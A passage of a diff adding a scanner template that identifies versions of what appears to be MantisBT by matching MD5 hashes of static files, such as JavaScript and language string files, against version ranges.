"(\"bfef3476ef3ff58fa40ad8b02af1c2f5\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"3b363761c10fdb023ad931e68008b00b\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"731e41fb38611e47bb8a090572db97da\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"9388742b203a56e54f1e01d88284ff3f\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"6ea0d96ad554c77bfb34e550ecd08000\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"d8833768625973669a37e336fb62572d\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"3678a76c0db11c4dbf30e112679e0d1a\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"a7e701a078eee03f89dcecb39676496b\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"662b76e07e7958aabaa0dcfdae225774\" == md5(body))" + - type: dsl + name: 1.2.1 + 
dsl: + - "(\"101666d1b20d929afec115ade89557c8\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"f68f5e21cf7f14731fcafaf3945d40c8\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"f5346f93463a708bd402dd72ba43c3c1\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"03cb42cca291da468af87b77b85b99ec\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"36f531846777ef289bf5daaa3f66e572\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"06fbb5605fa2c8944574ab7ab8c1b532\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"6259d027c7679d96c18b7a06c65b181b\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"c5c35510aa8c79edf7d72459780a5df9\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"eb8da4dc1ea0f3e0a4a54af44189dc3e\" == md5(body))" + - type: dsl + name: 2.14.0 + dsl: + - "(\"0babb3b8174ed8bbee5d71204dc8dc1c\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"cadf21828d8923c06d731bc9baec08ee\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.18.1 + dsl: + - "(\"d2f8e34e8d495bbafad8d61e4cdbb9dc\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"83cb29f226c95d140013c95237129720\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"7aadcfcd1c58fafa92550cf14db9e82a\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"8c3580d5826262b2884accd76be08e92\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/adminguide/en/configuration.sgml" + + matchers: + - type: dsl + name: 1.2.9 + dsl: + - "(\"cd6803e12fab2d6eff1b4f85c1ae9bea\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"def91ecc86fcf2725b41de2e8ad700d1\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"b6a40c7ae0c2ca0ea7da22f187ab2f60\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"2746c6c6312b4df7f91d372917dd42e7\" == md5(body))" + - type: dsl + name: 1.2.1 - 1.2.3 + dsl: + - 
"(\"15eae62f9cd1ded23b9a7858bd9bd127\" == md5(body))" + - type: dsl + name: 1.2.10 + dsl: + - "(\"ec2f9178abbc0feb59ce718e6d12447f\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"cc84dda7867100f4d4ebac5f823a756e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/common.js" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"4cf3fdd4f5d8ce44dd7a7ff9ec76e851\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.5.2 + dsl: + - "(\"6534355abb7b38b1895f5aec87a0911d\" == md5(body))" + - type: dsl + name: 2.3.1 - 2.3.3 + dsl: + - "(\"0a5ffb6f2bc29590b7f27cbd61fb9a06\" == md5(body))" + - type: dsl + name: 2.3.0 + dsl: + - "(\"4faacae14007bbdecac275e0ccb29a6b\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"918b78300758cf38269d04de2284573a\" == md5(body))" + - type: dsl + name: 2.1.1 - 2.1.3 + dsl: + - "(\"71f340721249aa21b75f17cb093d557f\" == md5(body))" + - type: dsl + name: 2.1.0 + dsl: + - "(\"ca3d0fd8c25c7a23622586d24ad7e66b\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"ba539d66cd98e24d0fd4a0c8daee93bc\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"92b4f15c87e8db612c31211aa0be9d6f\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.12.2 + dsl: + - "(\"3a8e41fa2e140f41306a68eb014f57f8\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.16.1 + dsl: + - "(\"f995cf8ce0b3d0f3f8df6b4c0fd2c0e7\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.18.1 + dsl: + - "(\"53ae82acd46f2e36728856a7c5f575f3\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"774aa4ba32ad52e9cd02af764b772721\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"d1e7d75e8d7a9c740b5f82006be18bd6\" == md5(body))" + - type: dsl + name: 2.21.0 + dsl: + - "(\"0dec04476282f71d19f4da38025a2974\" == md5(body))" + - type: dsl + name: 2.21.1 - 2.21.3 + dsl: + - "(\"c83068458977365194fa4cfc6b52e0b8\" == md5(body))" + - type: dsl + name: 2.22.0 + dsl: + - "(\"874ac19304570afa9cb2b0eb80bed888\" == 
md5(body))" + - type: dsl + name: 2.22.1 - 2.22.2 + dsl: + - "(\"3753a62312977c2e07363f069f546ce9\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"d9abe577a336a4994e4c34dbf638c793\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_latvian.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.19.1 + dsl: + - "(\"d6cb27c7c50a5eb44efb0dc695d906f1\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.5.2 + dsl: + - "(\"24697b925d4fd90c4d5552970f39fc5d\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"e9adb87ed324e20944d4032e0bda01ca\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"9b9eb362c6d1a3636fa95a0663f98022\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"c4a3b7ac880610c775d0f8c1ec2347e1\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"176c84ed54eda46c237ee95b325ac2eb\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"055247de15a8c3da595232813ceb2898\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"0af6b1824d71ec8eac156480c347dca7\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"b189a2de9914ff99759519baee397932\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"8d3f5b157e31c7a373dd526b6fc57630\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"fb62ac377efae991d86fc3c03f64a6fe\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"e97b7ee3d6fba4da4d81f4b6f571e9ba\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"d2e79e48701964eee7183ff8a19dc310\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"49c6703118d88d89d8978101342f15b5\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"1b657a62c29f358eae2dba81c6f597e3\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.9 + dsl: + - "(\"f2c4c4e66de564cc7194cc5ef881806b\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"b9519f6cb511230a3f3df6839a51191b\" == 
md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"9ffeb9d3622ff313ad099842ff277be0\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"7b9602b61ab2dd9b0f85c3787211d0b2\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"849ec25bd1cc2353ade8bf4411d06b7c\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"1ff1130a0e810bdf2906e174d3b370bf\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.23.1 + dsl: + - "(\"029223150741404e738ee928bec8b4f1\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"ac79ccf798b3b38f9ea8d21219f5f55d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_arabicegyptianspoken.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.11.1 + dsl: + - "(\"f856518900558d62147f965b5f382482\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"cedad28a1a609ae0e7927580b71a4608\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"e1907c0e6828a0d6425493ba1dcaccaa\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"22d59ba2470239e9adc5b115b9207360\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"af60de9f6b0444d54cf6b07f6eb661e1\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"8149320b8a7f9619f777889a31e3e3ee\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"4b640d3617e0c5c8ae565046d1ef6650\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"8f9682d9cebad272e21ae19acda04ef1\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"44c9f57833f95582e7464e566e219020\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"0934c4acf5976065a45f869f9b14ec2b\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"2db0fe94717e5b4f82c0a0b070336769\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"4fa8f03c1acbbcf137487670f8340fed\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"b88688ea8ed783b9142d4e60b32c70a6\" == 
md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"2efe1f3fd777265c37f032caf4638b39\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"ee62aab3f096bc1a0d4a67a58a97f96f\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"7130ada9e3be4e33e66e7dd2e8ef50f4\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.17.2 + dsl: + - "(\"5fb5fb8b75996fa140d60eb421fde097\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.18.1 + dsl: + - "(\"3ee4fe984fe2865af1903305faa9d6f0\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"a25d698145aac007fc6f7e34786899a7\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"032eb1d746b36d10db1b6cbcf702a014\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"74442ba9d26338302ce76a8e4fc2e7f7\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.23.1 + dsl: + - "(\"9d2a6889ff135bd4a4246ff38baa42f3\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"1c8eb871d3bfc71eeca056c545619d49\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_serbian_latin.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.11.1 + dsl: + - "(\"b1caad0b6c8c325d8e463f8f3928f300\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.5.2 + dsl: + - "(\"5b0c873cceaf9eb16a74c9c4d35763ca\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.3.3 + dsl: + - "(\"6ed6406ef1d4e7afc079f4f936675b09\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"d7935d183d95a7fd43b3bed75d148f76\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"d871af0e30642518fcbf6cf1bf1978a6\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"c94494c47006fb17667fec771195eae1\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"8b8fd93f8f9b42528e1f406ce436d7bc\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"a728c6026690cb2c00c0bb9737f36d39\" == md5(body))" + - type: dsl + name: 1.2.15 - 1.2.16 + dsl: + - 
"(\"f0436a5c589764d7bbba98a71a140b0b\" == md5(body))" + - type: dsl + name: 1.2.14 + dsl: + - "(\"283cbec3b0d5779fbb5cec62b440cd03\" == md5(body))" + - type: dsl + name: 1.2.13 + dsl: + - "(\"c9a834353069055e97998f3b302ffcda\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"c811ff74290579473b9c615fdf84116f\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"93202d89f1585f984ba49f1f30cc7f6c\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"f41ac57cf653f50285432309a3c20d0a\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"a8ed9fb101603e4103a80af58de86ffc\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"9db9a7761f01f8c2ea073ab40ec781df\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"0c499d8f366637255988f4009e87b177\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"b583515a73d4818184265c684a95c57b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_estonian.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.11.1 + dsl: + - "(\"ee4fd6aba640361e3f8a1b34713c795d\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"68346ef7a093d511ad6ddf7889817b64\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"92a71950cf9ff48265b836fffdc285af\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"6d726a69649df9d3ba2f47a0fbef5832\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"8a63cead891bc4accb8a7b67bc77020e\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"f4aa3b236c102fee3668e33d6adb54ef\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"27537ecf13a850f3171d42db42dc3d0b\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"eaf991121301234b8b3bd2b6f8cd723f\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"928205b172b300ee00c569a23448a9de\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - 
"(\"f293065bee2be5166f735b771182c1b8\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"cd8cf56a0a75eb672b986d10c29f329c\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"c5682b5182d3ab4801bbe1579d2a0b64\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"d271023b80073e44906e87b4d7173ec1\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"2e46684714ea163bc1fb18a4a24811fd\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"7f67f504f87d3c72462d4b0d7d20825d\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"fb9866053e2c11179232add4f3cbe00c\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"9d9360fe581a3bb12cc4e4a8243874bc\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"420045e995813d6ce7a1c6681da48270\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"f126c7ddbf5b75143d8da19f2db4830c\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"f90ceeb462d19c75a8cc22291508d155\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"980f29441a77aa40de40d8e531b2a890\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"5144c847981b3cd1b02f6b43c8935cd3\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"c1245fa93951378a75e38c342eebb5d0\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"18b59326e938182481acf4dd5cf95deb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_norwegian_bokmal.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"b6ed7b61bfe05b6456d4e121f5be2bf5\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"1c0f1b8f89137e0c3d6ef8e42360ef1e\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"8a7dd96b9034d862f6bcb0ae3a59876b\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"35f5a05219f38a4596e91e94551bd0d7\" == md5(body))" + - type: dsl + name: 
1.2.17 - 1.2.20 + dsl: + - "(\"2ba71eca78a7b9ea1619001b924a82f2\" == md5(body))" + - type: dsl + name: 1.2.15 - 1.2.16 + dsl: + - "(\"f2c890743666149e9b17acc4a5f0264b\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"263e2fe6aa366503a4aae873f8a90274\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"c07c25256e7b2f4b35fc6a7f66b59603\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"f6561de60f2bdb6e3cebeed623082e12\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"4b059bfb95aa264726296dfe10606b85\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"642e622c9d7c20c492032d6e17bb3795\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_chinese_simplified.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"59be01551e524f48203052ff21150106\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"815eab1402ab7e18d798c47894000806\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"e632be2ebfb75a0b99a95b38dd00ea9c\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"63b8645e6e9d9528e38903d9982f5894\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"7f43851be30ccb12c7b951c5649c4a21\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"d7f6596055fdef6067ba46098cfaf351\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"731a1f8546c8194cc8411fb9e4c08eb2\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"41b2a26f065fb0a88bba313d032d339e\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"0aa9d40a8724e030708594c87a54af40\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"c2dc0f671d9b62dab990377d94ee7a78\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_ripoarisch.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"1f80ffe4dfbfbbbf8ad3ec1dafae186c\" == md5(body))" + - type: dsl + name: 
1.2.9 - 1.2.11 + dsl: + - "(\"3cdd05a581790655166cacb7c06a8f58\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"ccf83653d0a056bbbf7bc5a22cf9a398\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"166712d2b736905383bf33681992dd25\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"72e41b4b94e0a7ec104f5320f8e6b995\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"5d3764e1df6494c660e7be2e3f8ee2bb\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"44daee7a56a39cb8463e3f0b530af969\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"c3696b8e8b2d869e630ad9f8d8b1b0f2\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"78b1b4e13030b34183ac05f7d135de49\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"07066af33738cdb7203faecb41b8ade0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_norwegian_bokmal.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.24.3 + dsl: + - "(\"c8cc80446359b4c789ee2ac4d4d97ed5\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.1.3 + dsl: + - "(\"5bdae3435ca5d8d94a5eb7a7de16d47a\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"2119f8fb3057a97de0ac23185bc501e4\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"cbc70626e237ab14709d426685da6093\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"adad0bbe185c739301e2c9457bdf9a7f\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"42fb32b16279d1010b6289c64e4753f5\" == md5(body))" + - type: dsl + name: 1.2.15 - 1.2.16 + dsl: + - "(\"8c922b2c7fc068ffef25382acdd35026\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"9aa18c364f05aadf9ac5ef5e5c2ab611\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"cfeb45eb41069b129e12d3a55d178014\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"b4fce81c0be56b779e61a8683c39e20d\" == md5(body))" + - type: dsl 
+ name: 1.2.1 + dsl: + - "(\"9f92a27172cbbb56da191df96cbab1f1\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"16023e56be654cec49c78494b14e9af0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Installation.xml" + + matchers: + - type: dsl + name: 2.6.0 - 2.10.1 + dsl: + - "(\"bf77bd97c9d950e3b4d65c718b76a8bd\" == md5(body))" + - type: dsl + name: 2.5.2 + dsl: + - "(\"c90fad1ffc0410df029ba27bb63fe250\" == md5(body))" + - type: dsl + name: 2.0.1 - 2.5.1 + dsl: + - "(\"3d9eb71449d72a52b8bf1a9a9c62697d\" == md5(body))" + - type: dsl + name: 2.0.0 + dsl: + - "(\"0ee067afcd4689edadc6c3403fcd0d70\" == md5(body))" + - type: dsl + name: 1.3.5 - 1.3.11 + dsl: + - "(\"208f7471154868d2b2ae2071bcd2068c\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"e5a97f29f1b6ea4197f56e7791ec2212\" == md5(body))" + - type: dsl + name: 1.3.3 + dsl: + - "(\"b27bb465118cd075cd4ac6579ad8233a\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.2 + dsl: + - "(\"dda21bf4a3368bbe482fecebb36da4ab\" == md5(body))" + - type: dsl + name: 1.3.12 - 1.3.20 + dsl: + - "(\"0e1bc9ddcdd1d80adbd6d5161107427d\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.12.2 + dsl: + - "(\"b61ee0b102be9db3f90b3f0dddab3867\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"5fc41524b46a787eb3cda6ef3515e535\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"37ddaf623fcda1288965c36c9c022a3c\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"5cc68747adffdbe3febf6a041f70f638\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.23.0 + dsl: + - "(\"55a2ddd08eb62afbc4a7dac12afd9e3d\" == md5(body))" + - type: dsl + name: 2.23.1 - 2.24.3 + dsl: + - "(\"e74ca062c5ddacbb5a965a72cae4b8b9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/README.md" + + matchers: + - type: dsl + name: 2.6.0 - 2.7.1 + dsl: + - "(\"40733c6a5fca3b2b751e4e5d43fad5a6\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.5.2 + dsl: + - 
"(\"7dc0c0dcbee6c6dadafb7430fd139819\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"b1c8b9d8921a93642e485bd9b265dac9\" == md5(body))" + - type: dsl + name: 2.0.1 + dsl: + - "(\"74b7612daedc72035c40078404132d97\" == md5(body))" + - type: dsl + name: 2.0.0 + dsl: + - "(\"29b5d9be5bdaeb2b0350dc521730ae0b\" == md5(body))" + - type: dsl + name: 1.3.6 - 1.3.16 + dsl: + - "(\"e55e2817ddac03fc31f66b07662fd833\" == md5(body))" + - type: dsl + name: 1.3.5 + dsl: + - "(\"f8f591a79fe2b064459e3c9f7c3953b8\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.4 + dsl: + - "(\"a31bdd164b5b45de332d16af5c10848f\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.12.2 + dsl: + - "(\"59cb8f4f69fbd9b0e4209c66bf67124f\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.19.1 + dsl: + - "(\"45531d9be30477991a6ad13cd02e6367\" == md5(body))" + - type: dsl + name: 1.3.17 + dsl: + - "(\"3f46bc17778066b55c651050e9ddc1a5\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"f09030cfa802461de1df40f1c49f2600\" == md5(body))" + - type: dsl + name: 1.3.18 - 1.3.20 + dsl: + - "(\"4a3f4fa0ca508c03d6f3f16377cbefe2\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"1e265daa2d4ee7930c69d42b948ca88a\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"53cf30d00c9c61d5ba770a3cc1cb8c36\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_chinese_traditional.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.19.1 + dsl: + - "(\"083791493c13b4da09f8fc115d39047b\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.5.2 + dsl: + - "(\"59aba10e40281afca8308a8c1c19ef53\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.3.3 + dsl: + - "(\"a5f1ef7c24e147a30e2ecd9f2e7d65d0\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"487925e0626a0948c6874d4e7528b1ae\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"9815f297c0c25c121ed890b1dc60b84c\" == md5(body))" + - type: dsl + name: 1.3.0 - 
